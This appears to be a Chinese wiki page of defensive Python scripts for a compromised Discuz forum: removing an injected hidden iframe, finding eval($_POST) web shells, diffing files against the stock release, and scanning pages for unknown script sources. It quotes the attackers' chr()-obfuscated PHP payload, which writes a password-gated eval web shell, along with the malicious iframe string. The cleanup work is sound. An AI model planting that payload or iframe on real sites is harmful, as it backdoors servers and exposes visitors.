navigation
搜索
查找并删除木马代码
import os import sys import re ##网站目录 n = "./" ##木马代码 js = "<iframe src=http://asd3.9966.org/kuaile123/4.htm"+" width=111 height=0 border=0></iframe>" for root,dirs,files in os.walk(n): #if root.find('/attachments') == -1: #print root,dirs,files for f in files: sContent = open(root+"/"+f).read() ##if f.endswith(".php") or sContent.find(js) != -1 : if sContent.find(js) != -1 : print root + "/" + f s = sContent.replace(js, "") if s and s !='': open(root + "/" + f , 'w').write( s )
查找web shell代码
查找所有 eval($_POST)类似代码
import os import sys import re ##网站目录 n = "./" ##查找 eval($_POST) 类似代码 p = re.compile("eval([ \t\n\r]*)\(([ \t\n\r]*)\$_(post|get)([ \t\n\r]*)", re.I) for root,dirs,files in os.walk(n): #if root.find('/attachments') == -1 : #print root,dirs,files for f in files: sContent = open(root+"/"+f).read() m = p.search(sContent) if f.endswith(".php") and m: print root + "/" + f print " ", m.group()
比较代码
比较论坛代码与原始dz代码有哪些文件不同
import os dzpath = "/home/kenvin/discuz/upload/" webpath = "/data/forum" os.chdir(webpath ) for root,dirs,files in os.walk("."): if root.find('/attachments') == -1 and root.find('/data') == -1 and root.find('/forumdata') == -1 : #print root,dirs,files for f in files: if f.endswith(".php"): #sContent = open(root+"/"+f).read() #m = p.search(sContent) mysize = os.path.getsize( root+"/"+f ) if os.path.exists(dzpath + root+"/"+f ): size = os.path.getsize(dzpath + root+"/"+f ) if mysize != size : print root+"/"+f , "\t", mysize, size else: print root+"/"+f
在dz自定义风格中插入的代码
变量名:
','');fputs(fopen(chr(117).chr(115).chr(101).chr(114).chr(103).chr(114).chr(111).chr(117).chr(112).chr(95).chr(48).chr(46).chr(112).chr(104).chr(112),chr(119)),chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(40).chr(115).chr(117).chr(98).chr(115).chr(116).chr(114).chr(40).chr(109).chr(100).chr(53).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(39).chr(98).chr(39).chr(93).chr(41).chr(44).chr(50).chr(56).chr(41).chr(61).chr(61).chr(39).chr(55).chr(97).chr(97).chr(97).chr(39).chr(41).chr(32).chr(38).chr(38).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(39).chr(97).chr(39).chr(93).chr(41).chr(59).chr(63).chr(62));//
检查网站页面是否有不明js或iframe
import re import urllib url = "http://forum.techweb.com.cn" olist = ['techweb.adsame.com', 'www.techweb.com.cn', 'www.google-analytics.com'] p = re.compile("<(script|iframe)[^>]+src[\s]*=[\s]*['\"]?http://(.*?)['\"]?[ />]", re.I + re.S) c = urllib.urlopen(url).read() m = p.findall(c) for n in m: if n[1] not in olist: msg = url + " find " + n[0] + " src=http://" + n[1] print msg #send(msg, True)
